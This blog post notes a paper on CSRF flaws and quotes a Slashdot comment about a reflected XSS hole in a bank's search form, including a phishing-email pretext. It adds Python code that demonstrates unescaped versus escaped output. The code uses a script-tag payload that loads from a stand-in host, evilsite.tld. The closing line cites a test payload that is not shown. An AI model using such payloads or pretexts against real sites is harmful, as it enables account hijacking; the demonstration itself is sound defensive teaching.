Princeton researchers released a research paper yesterday documenting Cross-Site Request Forgery (CSRF) vulnerabilities in four well-known commercial websites (ING Direct, NY Times, YouTube, and Metafilter). It makes for interesting reading.
This is now being discussed on Slashdot.
My favourite comment so far…
by karmatic (776420) on Tuesday September 30, @02:06AM (#25201899)
This really isn’t that surprising. A number of years ago, I was in a Wells Fargo branch; their kiosks are limited to showing only wellsfargo.com.
So, in an attempt to get to another site, I typed some HTML into the search box on their homepage, and pretty much every page on their site. Sure enough, it inserted the HTML into the page without any problems.
So, with a simple link to a search for something like <script src="http://evilsite.tld">, I could take complete control over someone’s bank account. This would be easy to pull off with an email saying something like “We have detected suspicious activity; click here to log on to wellsfargo.com”. It really would take them to wellsfargo.com, and they could log in. You don’t need a user/password if you control the browser.
I let them know that day, and explained how one escapes HTML. To their credit, it was fixed in a very short period of time. That still doesn’t excuse that 1) they should know better, and 2) if you’re going to check anything, it should be the one form that’s on every page.
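The defect the comment describes, a site-wide search form reflecting its input into the page unescaped, shown as an added example that is neither the commenter's code nor the bank's: it renders a constructed search page with and without HTML escaping and parses the result to see whether injected script or event-handler markup would be live. The page template, the payloads and the hostname evilsite.tld are constructed for the example.

```python
import html
from html.parser import HTMLParser

# Constructed payload of the kind the comment describes: a "search term" that is
# really a tag pulling a script from a third-party host.
INJECTED = '<script src="http://evilsite.tld"></script>'

# Constructed page template: the query lands in two contexts, an attribute value
# (the search box on every page) and element text (the results line).
PAGE = """<html><body>
<form action="/search"><input name="q" value="{q_attr}"></form>
<p>Results for: {q_text}</p>
</body></html>"""


def render_search_page(query, escape):
    """escape=False reproduces the defect; escape=True is the fix the commenter explained."""
    if escape:
        # quote=True also encodes " and ', which is what keeps the attribute context closed
        safe = html.escape(query, quote=True)
        return PAGE.format(q_attr=safe, q_text=safe)
    return PAGE.format(q_attr=query, q_text=query)


class _TagCollector(HTMLParser):
    """Collect <script> sources and on* attributes the browser would act on."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.scripts.append(attrs.get("src") or "")
        self.handlers += [k for k in attrs if k.startswith("on")]


def script_sources(page):
    """src values of script elements present in the rendered page."""
    p = _TagCollector()
    p.feed(page)
    return p.scripts


def event_handlers(page):
    """Names of inline event-handler attributes present in the rendered page."""
    p = _TagCollector()
    p.feed(page)
    return p.handlers
```

The attribute-breakout payload in the test matters because escaping only `<` and `>` would still leave the search box open to it.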